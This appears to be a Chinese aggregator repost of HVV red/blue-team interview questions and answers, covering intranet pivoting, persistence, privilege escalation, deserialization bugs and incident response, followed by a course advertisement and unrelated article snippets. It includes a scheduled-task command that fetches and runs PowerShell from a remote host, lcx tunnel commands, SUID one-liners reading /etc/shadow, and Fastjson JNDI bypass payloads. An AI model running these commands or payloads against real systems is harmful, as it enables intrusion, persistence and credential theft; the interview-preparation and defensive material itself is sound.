当前位置: 首页 > article >正文

吃透护网面试!HVV 行动全套面试题目及答案,网安新人入门进阶必备

本文全面整理网络安全面试题涵盖HVV、OWASP Top 10漏洞原理与修复方法。详细讲解内网渗透技术、权限维持方法、Windows/Linux系统提权技巧以及渗透测试流程和应急响应策略。还包含红蓝对抗概念、漏洞挖掘经验、常见中间件漏洞和安全基础知识为网络安全从业者提供系统性的学习参考和实践指导。这段时间有几个师傅来要面试题就随手整理一下以前用到的面试题想了想直接在公众号上分享出来给有需求的师傅们。hvv面试题owasp top 10问 漏洞原理和修复方法略内网渗透拿到webshell查看本机权限、用户登录情况是否需要提权查看本机是否存在域是否有内网使用lcx或直接上线cs建立隧道以便于对内网进一步进行攻击。(使用frp、nps也是一样的)目标机器上 lcx.exe -slave vpsip 12345 127.0.0.1 3389 vps上 ./lcx -m 2 -p1 12345 -p2 6666探测内网存活主机和开放端口(可以使用fscan等工具)用cs或者有免杀效果的mimikatz抓取本机最高权限密码、尝试哈希传递、尝试IPC连接来横向移动获取目标权限对内网的开放web界面与端口进行攻击如开放了445端口可以测试是否存在ms17-010漏洞测试开放的WEB页面是否有RCE漏洞关于权限维持Windows可以尝试创建影子账户创建定时任务schtasks /create /sc minute /mo 1 /tn Security Script /tr powershell.exe -nop -w hidden -c \IEX ((new-object net.webclient).downloadstring(\\\http://192.168.28.142:8888/logo.gif\\\))\dll劫持进程注入可以使用端口复用技术比如linux可以使用iptables; Windows可以使用HTTP.sys中的Net.tcp Port Sharing服务配合WinRM实现端口复用。做到类似把远程登录端口重定向到80端口的效果。直接使用之前抓取的管理员账号密码登录linux可以尝试ssh公私钥免密登录定时任务反弹shell利用openssh后门 设置SSH后门密码及root密码记录位置rookit后门自定义验证密码和端口号创建ssh公私钥在服务器上写入公钥使用自己的私钥登录。提权有哪几种方式最高权限 system、rootWindows查看本机补丁情况 systeminfo或者用msf查找缺失的补丁内核溢出漏洞提权居多烂土豆提权也多见于服务提权组策略提权令牌窃取 在MSF中可以使用incognito实现token窃取bypass UAC提权可以使用msf对用户账户控制进行提取把管理提升到systemLinux主要是内核漏洞和SUID提权lsb_release -a 查看系统发行版本uname -a 查看内核版本常见于脏牛提权CVE-2016-5195(低版本执行成功返回root权限会话)、CVE-2022-0874(新版本脏牛代码注入置空root密码)管理员为了运维管理方便sudo配置错误直接可提权一些早期版本的服务也可能会有提权漏洞但是这个存在的概率极小 如NFS开启且是root权限运行mysql提权有UDF提权MOF提权写入启动项提权等方式CVE-2016-6663、CVE-2016-6664组合利用的提权场景可以将一个www-data权限提升到root权限#Find find如果具有suid权限或使用sudo执行则find -exec执行的命令都会以root权限运行。 find pentestlab -exec whoami \; #Vim 可以使用命令模式执行系统命令 vim.tiny /etc/shadow #awk awk BEGIN{system(whoami)} #curl curl file:///etc/shadow #Bash bash -p #Less less /etc/passwd #Nmap nmap的2.02-5.21版本具有--interactive选项可以进入交互模式执行系统命令 nmap --interactive如若存在域(windows)可以尝试ms14-068得到域控权限(一个域内用户和密码或hashsuid利用kerberos的缺陷伪造域管权限访问服务器)CVE-2020-1472通过netlogon建立与域控的通道时获取域管权限ps: Netlogon服务为域控制器注册所有的srv资源记录。这些记录出现在DNS服务器的正向查询区域你的域名中的_msdcs, _sites, _tcp, and _udp等文件夹中。其他计算机利用这些记录查询域活动目录相关的信息。渗透测试流程应急响应被上了webshell应该怎么办定位shell位置如使用D盾或河马进行扫描查看事件和web日志定位webshell的创建时间进行系统排查查看是否有可疑用户、隐藏用户、克隆用户、影子账户排查进程、服务、驱动、模块、启动项查看网络连接情况判断是否有可疑ip连接排查计划任务、异常文件如temp下的文件分析流量查看特殊的referer、accept-language流量特征分析系统日志查看是否有危险操作加固系统查看webshell的上传点以上报并修复漏洞网页纂改 应急隔离被感染主机排查业务系统确定漏洞源头、溯源分析恢复数据和业务加固系统DDOS应急响应预防如下部署负载均衡和多节点服务采用集群部署抗DDOS设备部署流量监控设备结合威胁情报对异常访问源预警采用CDN服务服务器禁止开放业务无关端口。保证充足的带宽合理优化系统避免资源浪费对特定的流量进行限制对服务器定期排查被攻击后溯源和加固保留攻击期间的ip分析报警加固系统应急处置方法通过抓包、排查设备访问日志来判断DDoS攻击的类型封堵访问异常的IP针对攻击流量限制访问速率调整安全设备的防护策略流量超出出口带宽联系运营商进行流量清洗流量劫持应急响应局域网DNS劫持处置配置静态DNS服务器配置hosts文件绑定静态IP域名对hosts加密对个人终端进行病毒查杀修改路由器等设备弱密码对固件进行更新隔离主机严格进行访问控制对DNS服务器安全隐患进行排查广域网DNS劫持换一个 8.8.8.8 114.114.114.114 1.1.1.1HTTP劫持处置使用HTTPS协议访问拆分HTTP请求包用CSP和DOM事件进行监听防御链路层劫持处置TCP劫持处置抓包分析排查是否在内网大致物理位置若在运营商ISP层面及时联系客服ARP劫持处置绑定IP和MAC开启本地ARP防火墙开启网络设备ARP防护定位问题主机进行处理如为蠕虫病毒部署全面的流量监控。中了勒索病毒怎么办在客户同意的情况下马上下线隔离中招的主机避免影响到内网中其他的机器。排查业务系统是否受影响确定勒索病毒种类进行溯源分析恢复受影响的数据和业务加固系统中了挖矿木马怎么办隔离被感染的主机确认挖矿进程如查看cpu占用一般50%以上就很可疑然后对进程名进行排查阻断矿池连接清除挖矿定时任务、启动项定位挖矿木马位置并删除加固系统红蓝对抗红蓝对抗概念红蓝对抗的概念最早来源于20世纪60年代的美国演习演习是专指军队进行大规模的实兵演习演习中通常分为红军、蓝军其中蓝军通常是指在部队模拟对抗演习专门扮演假想敌的部队与红军(代表我方正面部队)进行针对性的训练这种方式也被称作Red Teaming。红军作为企业防守方通过安全加固、攻击监测、应急处置等手段来保障企业安全。而蓝军作为攻击方以发现安全漏洞获取业务权限或数据为目标利用各种攻击手段试图绕过红军层层防护达成既定目标。可能会造成混淆的是在欧美一般采用红队代表攻击方蓝队代表防守方颜色代表正好相反。现在的说法好像是叫做红队蓝军指的是攻击方。红蓝对抗目的• 评估现有防御能力的有效性、识别防御体系的弱点并提出具体的应对方案• 利用真实有效的模拟攻击来评估因为安全问题所造成的潜在的业务影响为安全管理提供有效的数据来量化安全投入的ROI• 提高公司安全成熟度及其检测和响应攻击的能力红蓝对抗流程攻击准备明确范围、目标、测试条件报备与授权流程行动成本预算攻击执行备案时间区间内备案目标范围内备案攻击ip与网络环境攻击完成恢复所有修改移除权限维持提交报告和改进建议红蓝对抗和渗透测试的区别渗透测试是通过模拟黑客攻击行为评估企业网络资产的状况。通过渗透测试企业及机构可以了解自身全部的网络资产状态可以从攻击角度发现系统存在的隐性安全漏洞和网络风险。渗透测试结束后企业还可以了解自身网络系统有无合法合规、遵从相关安全条例。渗透测试作为一种全新的安全防护手段让安全防护从被动转换成主动正被越来越多企业及机构认可。红蓝队对抗便是针对此方面的测试。红蓝队对抗是以蓝队模拟真实攻击红队负责防御与国外刚好相反最终的结果是攻防双方都会有进步。红蓝队对抗能挖掘出渗透测试中所没注意到风险点并且能持续对抗不断提升企业系统的安全防御能力。总结渗透测试是找出漏洞红蓝对抗可以测试即使处理攻击事件的能力有利于企业在遭受到攻击者成功入侵后知道如何正确应急。漏洞挖掘经验cnvd平时渗透时发现页面存在漏洞去cnvd和cve中查询是否存在然后使用fofa、shodan或者hunter批量查询页面指纹如图片哈希、部分源码等。写好3-6个案例、10个以上例子就可以提交cnvd。红队经验2021年10月份的攻防演练信息收集通过子域名挖掘和端口扫描、信息泄露等方式得到多处登录口部分可登录的账号密码有一可疑注入点尝试绕过无果使用扫描器扫描时发现一处s2漏洞getshell后第二天掉线了…页面也关闭。自己讲述经历怎么getshell怎么说研判做哪些工作研判组的工作是对设备组上传的事件进行研判判断攻击ip来源是哪个机房是不是内部的ip判断事件的类型比如是注入、远程执行还是恶意文件上传等判断受攻击主机是否有代理行为看看是否有可疑进程对主机的文件进行扫描以查询是否有木马对样本进行全流量报文或数据包分析确定攻击事件交给应急处理组。整理如下确定来源 确定攻击类型 确定是否为攻击行为 确定攻击路径 确定攻击的后果 如已经到哪个地步可能和已经产生的危害研判组交一个完整的报告给应急响应组进行响应反制组通过证据进行反制。设备组则是查看设备的告警分析是否误报将含有恶意流量的事件上报给研判组。封禁组负责封禁攻击者的恶意IP。(现在几乎看不见这么一个单独的组了)应急响应组负责对攻击事件进行响应查看事件带来的后果对主机进行应急排查后门等。溯源组负责对攻击者的信息进行溯源如日志、攻击IP溯源到攻击者的身份即可加分需注意 日志查看 客户沟通 全流量设备分析( 全流量采集与保存全行为分析以及全流量回溯 )如何判断设备误报把告警中的URL的“网页状态码”、“页面回显数据”判断来源IP是否内部来自那个机房判断告警的流量特征是否恶意从「待分析告警」中提取攻击特征通过「攻击特征规则库」进行匹配看能否获取到「情报线索」最得意的一次渗透经历自由发挥感觉可以说说供应链相关的经历。恶意流量分析https://www.yuque.com/sag9gg/rgibcn/xlibyq#0rAFDhttps://www.yuque.com/docs/share/f4a01078-3a41-4676-9101-48c3a8ed31a0?#常见中间件和端口漏洞https://www.cnblogs.com/xiaozi/p/13296754.html判断是否出网pingicmpcurlhttpnslookupdns没有明文只有hash时可以哈希传递黄金票据和白银票据区别金票使用krbtgt的hash构造任意tgt银票伪造TGS二者依托的有IPS了还需要IDS吗IDS基本上以旁路为主特点是不阻断任何网络访问主要以提供报告和事后监督为主少量的类似产品还提供TCP阻断等功能但少有使用IPS解决了IDS无法阻断的问题基本上以在线模式为主系统提供多个端口以透明模式工作。在一些传统防火墙的新产品中也提供了类似功能其特点是可以分析到数据包的内容解决传统防火墙只能工作在4层以下的问题。和IDS一样IPS也要像防病毒系统定义N种已知的攻击模式并主要通过模式匹配去阻断非法访问IPS入侵防御系统(IPS: Intrusion Prevention System)是电脑网络安全设施是对防病毒软件Antivirus Programs和防火墙(Packet Filter, Application Gateway)的补充。入侵预防系统(Intrusion-prevention system)是一部能够监视网络或网络设备的网络资料传输行为的计算机网络安全设备能够即时的中断、调整或隔离一些不正常或是具有伤害性的网络资料传输行为。IDS:IDS是英文“Intrusion Detection Systems”的缩写中文意思是“入侵检测系统”。专业上讲就是依照一定的安全策略通过软、硬件对网络、系统的运行状况进行监视尽可能发现各种攻击企图、攻击行为或者攻击结果以保证网络系统资源的机密性、完整性和可用性。做一个形象的比喻假如防火墙是一幢大楼的门锁那么IDS就是这幢大楼里的监视系统。一旦小偷爬窗进入大楼或内部人员有越界行为只有实时监视系统才能发现情况并发出警告红蓝对抗思维https://blog.csdn.net/weixin_43650289/article/details/109244790https://blog.csdn.net/qq_36119192/article/details/90411169基线检查基线巡检 就是检查各项设置的脚本友人的题确定来源 确定攻击类型 确定是否为攻击行为 确定攻击路径 确定攻击的后果到哪个地步了可能和已经产生的危害 研判组交一个完整的报告 交给应急响应组进行效应 反制组通过证据进行反制常规参加过护网蓝队负责事件研判工作主要使用 ipsids 等设备做流量监控与日志分析工作判断安全事件是否为误判研判工作要充分利用已有安全设备分析告警将全部流量日志日志条件源地址目的地址端口事件名称时间规则 ID发生 次数等根据研判标准进行筛选像挖矿、蠕虫、病毒、拒绝服务这类不太可能为攻击方发起的攻击的事件直接过滤掉减少告警数量一般情况下真实攻击不可能只持续一次它一定是长时间、周期性、多 IP 的进行攻击对于告警结合威胁情报库对流量日志的原 IP 地址进行分析判断其是否为恶意攻击推荐使用微步的插件如果确认为攻击行为或者不能确认是否为攻击行为进行下一步操作在之前准备好的表格中查找 IP 是否为客户内网部署的设备如果不是继续进行下一步在事件上报平台查看是否有其他人提交过如果没有则上报然后根据流量日志对请求数据包和返回数据包分析判断其是否为误报需要留意 X-Forwarded-For简称XFF和 x-real-ip 可以了解些 webshell 工具的流量特征尤其是免杀 webshell有可能不会被设备识别最后上报事件时尽可能提供完整的截图包括源 ip、目的ip请求包请求体响应包响应体等重要信息以方便后续人员研判溯源问了sql注入原理过于信任用户的输入没有对用户的输入进行过滤或者过滤不完全黑客精心构造 SQL 语句插入到数据库中数据库报错的信息被其他类型的 SQL 语句调用的时候触发攻击行为。因为第一次黑客插入到数据库的时候并没有触发危害性而是再其他语句调用的时候才会触发攻击行为这个就是二次注入预编译正则表达式过滤和各种注入特征宽字节注入原理gbk编码时人为两个字符是一个汉字如%aa%5c是一个因为过滤是在敏感字符前加\1 %df吃掉%5c%5c%27 的情况后面的%5c会被前面的%5c 给注释掉。这也是 bypass 的一种方法。响应包 200 500数据库信息外带通过查看数据库中最近新建的表的结构和内容是否有工具生成的临时表查询的语法结构和正常业务不同查询的范围超出了正常用户的查询内容范围基线巡检基线巡检 就是检查各项设置的脚本基线指操作系统、数据库及中间件的安全实践及合规检查的配置红线包括弱口令、账号权限、身份鉴别、密码策略、访问控制、安全审计和入侵防范等安全配置检查Http请求里都有什么请求方法URI协议/版本请求头(Request Header)请求正文GET、POST、PUT、Delete、HEAD、OptionsHTTP响应状态行响应头(Response Header)响应正文shiro反序列化编码方式客户端记住我的功能Rememberme的值提交时会被序列化然后进行aes加密再进行base64编码后形成 后来aes变成国密了服务端检索RememberMe cookie的值base64解码使用aes解码(加密密钥硬编码)执行反序列化操作(没有过滤)• payload是构造Cookie的RememberMe的值• RememberMe的值经过了AES加密、Base64编码• 请求包中RememberMe的值通常为512字节攻击者构造的payload的值一般远高于512字节将RememberMe的内容通过Shiro RememberMe在线解密的网站进行解密操作分析解密后的数据可以看到应该为Runtime.getRuntime().exec()这类函数执行了ping命令java/lang/Runtime* getRuntime()Ljava/lang/Runtime; ,- .ping shiro.l3jj9e.ceye.io0exec’(Ljava/lang/String;)Ljava/lang/Process;Fastjson反序列化提供了autotype功能, 允许用户在反序列化数据中通过“type”指定反序列化的类型1.2.24• 特征为请求数据中含有type字段• 原理:Fastjson在处理以type形式传入的类时会默认调用该类的共有set\get\is函数1.2.47反序列化漏洞• 特征为请求数据中含有type:java.lang.Class字段• 原理利用type加载dedserializers中的java.lang.class类里面传参要添加的类从而调用TypeUtils.loadClass()类来添加com.sun.rowset.jdbcRowSetlmpl类到mapping函数里最后实现调用type的值1.2.25-1.2.41补丁绕过{“type”:“Lcom.sun.rowset.JdbcRowSetImpl;”,“dataSourceName”:“ldap://localhost:1389/badNameClass”, “autoCommit”:true}在类名前面加了一个L可以绕过黑名单1.2.25-1.2.42补丁绕过{“type”:“LLcom.sun.rowset.JdbcRowSetImpl;;”,“dataSourceName”:“ldap://localhost:1389/badNameClass”, “autoCommit”:true}在CheckAutoType里面增加了一次对className的提取操作所以我们再写一对L和;来绕过黑名单1.2.25-1.2.43补丁绕过{“type”:“[com.sun.rowset.JdbcRowSetImpl”[{,“dataSourceName”:“ldap://localhost:1389/badNameClass”, “autoCommit”:true}绕过%40代替 \x2e代替.Structs S2-015远程代码执行漏洞• payload后面加上了.action• 远程攻击者可借助带有‘${}’和‘%{}’序列值可导致判断OGNL代码两次的请求利用该漏洞执行任意OGNL代码。s2-045• payload在content-type中• 该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息导致远程攻击者可通过发送恶意的数据包利用该漏洞在受影响服务器上执行任意命令。常见端口和漏洞序列化原理•序列化把Java对象转换为字节序列。•反序列化把字节序列恢复为原先的Java对象。• 有流量的厂商可以监控数据中是否包含AC ED 00 05或者rO0AB等特征。如果发现序列化特征可以进行攻击防护或者0day挖掘Java 序列化是指把 Java 对象转换为字节序列的过程便于保存在内存、文件、数据库中ObjectOutputStream类的 **writeObject() **方法可以实现序列化php和python中攻击者构造一个包含魔术方法的类在魔术方法中调用命令执行或代码执行函数实例化这个类的一个对象并把对象序列化后发送到程序程序反序列化对象时触发魔术方法而执行命令。java中反射机制同理攻击者构造恶意输入让反序列化产生非预期对象产生过程中就带来了恶意代码执行。webloginWeblogic存在管理后台通过账号密码登录由于管理员的疏忽经常会使用弱口令或者默认的账户名密码。因此存在弱口令爆破的风险。在本环境下模拟了一个真实的weblogic环境其后台存在一个弱口令并且前台存在任意文件读取漏洞。分别通过这两种漏洞模拟对weblogic场景的渗透。#SSRF漏洞CVE-2014-4210Weblogic中存在一个SSRF漏洞利用该漏洞可以发送任意HTTP请求进而可以攻击内网中redis、fastcgi等脆弱组件。#任意文件上传漏洞CVE-2018-2894Oracle 7月更新中修复了Weblogic Web Service Test Page中一处任意文件上传漏洞Web Service Test Page 在“生产模式”下默认不开启所以该漏洞有一定限制。利用该漏洞可以上传任意jsp文件进而获取服务器权限。影响版本10.3.612.1.3 12.2.1.212.2.1.3#XML Decoder反序列化漏洞CVE-2017-10271Weblogic的WLS Security组件对外提供webservice服务其中使用了XMLDecoder来解析用户传入的XML数据在解析的过程中出现反序列化漏洞导致可执行任意命令。影响版本10.3.6.012.1.3.0.012.2.1.1.0#CVE-2015-4852Weblogic 直接反序列化是基于Weblogic t3协议引起远程代码执行的反序列化漏洞#CVE-2016-0638Weblogic 直接反序列化基于Weblogic t3协议引起远程代码执行的反序列化漏洞 漏洞实为CVE-2015-4852绕过 拜Oracle一直以来的黑名单修复方式所赐#CVE-2016-3510基于Weblogic t3协议引起远程代码执行的反序列化漏洞#CVE-2017-3248基于Weblogic t3协议引起远程代码执行的反序列化漏洞 属于Weblogic JRMP反序列化#CVE-2018-2628基于Weblogic t3协议引起远程代码执行的反序列化漏洞 属于 Weblogic JRMP反序列化#CVE-2018-2893基于Weblogic t3协议引起远程代码执行的反序列化漏洞 实为CVE-2018-2628绕过 同样拜Oracle一直以来的黑名单修复方式所赐 属于Weblogic JRMP反序列化CNVD-C-2019-48814WebLogic wls-async 反序列化远程命令执行漏洞该漏洞存在于wls9-async组件这个组件主要作用是异步通讯服务攻击者可以向/ _async / AsyncResponseService路径下构造良好的xml格式的数据并保存在数据中的服务器端反序列化时执行其中的恶意代码从而可以getshell。非常规内网AD DC的区别如何快速定位域控主机。2012版本服务器如何dump密码PTT PTK的区别kerbois协议约束委派NTLM中继双网卡机器快速定位正向反向代理应用的场景隐蔽隧道师傅还有一个问题lof4j和fastjson怎么联动java组件进去如何降权中挖矿怎么办java反序列化的原理学习资源如果你也是零基础想转行网络安全却苦于没系统学习路径、不懂核心攻防技能光靠盲目摸索不仅浪费时间还消磨自己信心。这份 360 智榜样学习中心独家出版《网络攻防知识库》专为转行党量身打造01内容涵盖这份资料专门为零基础转行设计19 大核心模块从 Linux系统、Python 基础、HTTP协议等地基知识到 Web 渗透、代码审计、CTF 实战层层递进攻防结合的讲解方式让新手轻松上手真实实战案例 落地脚本直接对标企业岗位需求帮你快速搭建转行核心技能体系这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】**读者福利 |***CSDN大礼包《网络安全入门进阶学习资源包》免费分享 *安全链接放心点击02 知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。03 谁需要掌握本知识库负责企业整体安全策略与建设的CISO/安全总监从事渗透测试、红队行动的安全研究员/渗透测试工程师负责安全监控、威胁分析、应急响应的蓝队工程师/SOC分析师设计开发安全产品、自动化工具的安全开发工程师对网络攻防技术有浓厚兴趣的高校信息安全专业师生04部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】**读者福利 |***CSDN大礼包《网络安全入门进阶学习资源包》免费分享 ***安全链接放心点击**本文转自网络如有侵权请联系删除。

相关文章:

吃透护网面试!HVV 行动全套面试题目及答案,网安新人入门进阶必备

本文全面整理网络安全面试题,涵盖HVV、OWASP Top 10漏洞原理与修复方法。详细讲解内网渗透技术、权限维持方法、Windows/Linux系统提权技巧,以及渗透测试流程和应急响应策略。还包含红蓝对抗概念、漏洞挖掘经验、常见中间件漏洞和安全基础知识&#xff0…...

移动充电机器人AI边缘计算方案:从感知到精准对接的工程实践

1. 项目概述:当充电桩“活”了过来最近在跟进一个挺有意思的项目,跟几位做智慧园区和社区运营的朋友聊,他们都在头疼同一个问题:新能源车的充电焦虑,已经从“找不到桩”升级到了“桩被占着”。固定充电桩的利用率在高峰…...

构建统一AI服务网关:OpenAI兼容门面模式实践指南

1. 项目概述:一个兼容OpenAI API的轻量级门面最近在折腾大模型应用开发,发现一个挺普遍的需求:很多团队或个人开发者,手里可能握着不止一个AI服务提供商的API密钥,比如既有官方的OpenAI,也有国内的一些合规…...

开源项目质量门禁实践:从代码规范到安全扫描的自动化检查

1. 项目概述:一个开源项目的“守门人”最近在整理自己的开源项目时,我一直在思考一个问题:如何确保项目仓库的“健康度”?这里的健康度,不仅仅是指代码没有Bug,更是指整个项目的协作流程、代码质量、依赖安…...

基于BLE与CircuitPython的远程服务器重启开关设计与实现

1. 项目概述与核心思路手头有几台电脑分散在家里各个角落,有时候它们死机了需要重启,但偏偏其中一台作为监控录像存储的服务器,被我塞进了一个带锁的柜子里。每次都得找钥匙、开门、按按钮,实在麻烦。这个需求催生了我动手做一个无…...

AI智能体协作命令行工具squads-cli:多智能体编排与自动化实战

1. 项目概述:一个面向AI智能体协作的命令行工具如果你最近在关注AI智能体(Agent)的开发,尤其是多智能体协作(Multi-Agent Collaboration)这个方向,那你很可能已经听说过或接触过一些相关的框架。…...

Circuit Playground开发板入门:从零到一玩转集成传感器与Arduino编程

1. 项目概述与核心价值如果你对电子制作和编程感兴趣,但一看到复杂的电路图和密密麻麻的代码就头疼,那么Circuit Playground可能就是为你量身打造的“入场券”。它不是一个需要你从零焊接电阻、电容的散件包,而是一块将所有常用传感器和交互元…...

Android AI助手开发实战:基于MVVM与OpenAI API的AnywhereGPT项目解析

1. 项目概述与核心价值最近在折腾移动端AI应用,发现一个挺有意思的开源项目,叫AnywhereGPT-Android。简单来说,它就是一个让你能在Android手机上,通过调用OpenAI的API(比如GPT-3.5/4)或者本地部署的模型&am…...

多智能体协作框架Agentset:从原理到实战构建AI团队

1. 项目概述:当AI智能体开始“组队打怪”最近在AI应用开发圈里,一个词的热度持续攀升:智能体(Agent)。如果说大语言模型(LLM)是学会了“思考”的大脑,那么智能体就是具备了“感知-决…...

040二叉树的直径

二叉树的直径 题目链接:https://leetcode.cn/problems/diameter-of-binary-tree/description/?envTypestudy-plan-v2&envIdtop-100-liked 我的解答: 无分析:自己没有什么思路。 看了官方题解后的解答: int ans; public int d…...

基于MCP协议构建AI助手用户反馈闭环:从原理到工程实践

1. 项目概述:一个为AI助手“装”上用户反馈的桥梁最近在折腾AI应用开发,特别是想让大语言模型(LLM)驱动的助手能更“懂”用户。一个核心痛点出现了:助手处理完用户请求后,如何让用户方便地给出“好评”或“…...

039对称二叉树

对称二叉树 题目链接:https://leetcode.cn/problems/symmetric-tree/description/?envTypestudy-plan-v2&envIdtop-100-liked 我的解答: //方法一:递归 //时间复杂度:O(n) //空间复杂度:O(n) public boolean isSy…...

基于LLM与LangChain的智能项目管理Agent:架构设计与工程实践

1. 项目概述:一个面向项目管理的智能体框架 最近在开源社区里,我注意到一个名为 gannonh/agent-pm 的项目开始受到一些关注。乍一看这个名字,你可能会联想到“项目经理”或者“项目管理”,没错,这个项目的核心定位&…...

大模型私有化部署实战:LLAMATOR-Core核心引擎配置与性能调优指南

1. 项目概述:从“大模型”到“小核心”的工程化实践最近在折腾大模型应用落地的朋友,可能都绕不开一个核心痛点:如何把一个动辄几十GB、几百亿参数的“庞然大物”,真正塞进自己的业务系统里,让它稳定、高效、可控地跑起…...

VMware macOS解锁神器:Unlocker 3.0终极完整指南

VMware macOS解锁神器:Unlocker 3.0终极完整指南 【免费下载链接】unlocker VMware Workstation macOS 项目地址: https://gitcode.com/gh_mirrors/unloc/unlocker 想要在Windows或Linux电脑上体验macOS系统,却苦于VMware默认不支持苹果系统&…...

基于LLM的AI新闻智能体:自动化信息采集与周报生成实战

1. 项目概述:一个能自动追踪AI新闻的智能体 最近在GitHub上看到一个挺有意思的项目,叫 ai-news-weekly-agent 。光看名字,你大概能猜到它是个和AI新闻相关的自动化工具。没错,它的核心目标就是扮演一个“AI新闻周刊编辑”的角色…...

突破性模组管理革命:RimSort如何解决RimWorld玩家的三大核心痛点

突破性模组管理革命:RimSort如何解决RimWorld玩家的三大核心痛点 【免费下载链接】RimSort RimSort is an open source mod manager for the video game RimWorld. There is support for Linux, Mac, and Windows, built from the ground up to be a reliable, comm…...

HsMod终极指南:如何通过55项功能全面优化炉石传说游戏体验

HsMod终极指南:如何通过55项功能全面优化炉石传说游戏体验 【免费下载链接】HsMod Hearthstone Modification Based on BepInEx 项目地址: https://gitcode.com/GitHub_Trending/hs/HsMod HsMod是基于BepInEx框架开发的炉石传说模改插件,专为提升…...

英雄联盟智能BP与战绩查询:你的排位赛终极助手

英雄联盟智能BP与战绩查询:你的排位赛终极助手 【免费下载链接】Seraphine 英雄联盟战绩查询工具 项目地址: https://gitcode.com/gh_mirrors/se/Seraphine 你是否曾经在排位赛BP阶段手忙脚乱,不知道该禁用哪个英雄?或者想了解队友和对…...

终极iOS越狱完整指南:5个步骤解锁iPhone隐藏功能

终极iOS越狱完整指南:5个步骤解锁iPhone隐藏功能 【免费下载链接】Jailbreak iOS 26.4 - 26, 17 - 17.7.5 & iOS 18 - 18.7.3 Jailbreak Tools, Cydia/Sileo/Zebra Tweaks & Jailbreak News Updates || AI Jailbreak Finder 👇 项目地址: http…...

如何用茉莉花插件实现Zotero中文文献元数据一键抓取:终极解决方案

如何用茉莉花插件实现Zotero中文文献元数据一键抓取:终极解决方案 【免费下载链接】jasminum A Zotero add-on to retrive CNKI meta data. 一个简单的Zotero 插件,用于识别中文元数据 项目地址: https://gitcode.com/gh_mirrors/ja/jasminum 还在…...

Page Assist终极指南:3步安装本地AI浏览器助手,开启智能网页浏览新时代

Page Assist终极指南:3步安装本地AI浏览器助手,开启智能网页浏览新时代 【免费下载链接】page-assist Use your locally running AI models to assist you in your web browsing 项目地址: https://gitcode.com/GitHub_Trending/pa/page-assist 想…...

2026亚洲消费电子展!媒体曝光资源加码

北京讯——2026年6月10日至12日,2026亚洲消费电子展将在北京盛大启幕。作为亚太消费电子领域极具影响力的行业盛会,本届展会全面升级品牌传播矩阵,百家主流媒体集结现场全程报道,全媒体曝光资源重磅加码。目前展会赞助合作席位余量…...

CircuitPython开发板选型指南:从需求到Adafruit产品实战解析

1. 项目概述:为什么选择CircuitPython开发板是个技术活如果你刚开始接触硬件编程,或者是从Arduino转向更友好的开发环境,那么CircuitPython绝对是一个让人眼前一亮的选项。它把Python的简洁语法带到了微控制器上,让你能用几行代码…...

基于Arduino与IRLib2的万能遥控器DIY:从红外解码到蓝牙HID的嵌入式实践

1. 项目概述与核心价值如果你和我一样,家里电视、机顶盒、音响、空调的遥控器堆满了茶几,每次想用都得翻找半天,或者你正在为一位行动不便的亲友寻找一种更便捷的控制家电的方式,那么这个基于Arduino和IRLib2的万能遥控器DIY项目&…...

AI Agents 越智能,企业的人类判断力需求反而会爆炸式增长:Jevons 悖论在企业落地中的隐形反弹

在企业全面拥抱 AI Agents 的当下,最容易被忽略的不是模型能力,而是“智能变便宜”之后带来的责任边界扩张。产品团队让 Agent 自动起草客户邮件、更新工单、标记流失风险、总结销售通话、推荐代码变更、升级支持问题、准备决策材料——每一步都变得前所…...

Windows驱动管理专业解决方案:Driver Store Explorer完全指南

Windows驱动管理专业解决方案:Driver Store Explorer完全指南 【免费下载链接】DriverStoreExplorer Driver Store Explorer 项目地址: https://gitcode.com/gh_mirrors/dr/DriverStoreExplorer Driver Store Explorer(简称Rapr)是一款…...

CircuitPython硬件编程在Linux单板机上的实现:以ODROID C2为例

1. 项目概述:当CircuitPython遇见Linux单板机如果你玩过树莓派Pico或者Adafruit的Feather开发板,肯定对CircuitPython不陌生。它让Python跑在了微控制器上,用几行代码就能点亮LED、读取传感器,对硬件新手和快速原型开发来说&#…...

ncmdump终极指南:3步快速解锁网易云音乐NCM加密文件的完整免费解决方案

ncmdump终极指南:3步快速解锁网易云音乐NCM加密文件的完整免费解决方案 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的歌曲只能在特定客户端播放而烦恼吗?ncmdump这款强大的NCM解密工…...

041二叉树的层序遍历

二叉树的层序遍历 题目链接&#xff1a;https://leetcode.cn/problems/binary-tree-level-order-traversal/description/?envTypestudy-plan-v2&envIdtop-100-liked 我的解答&#xff1a; public List<List<Integer>> levelOrder(TreeNode root) {List<Lis…...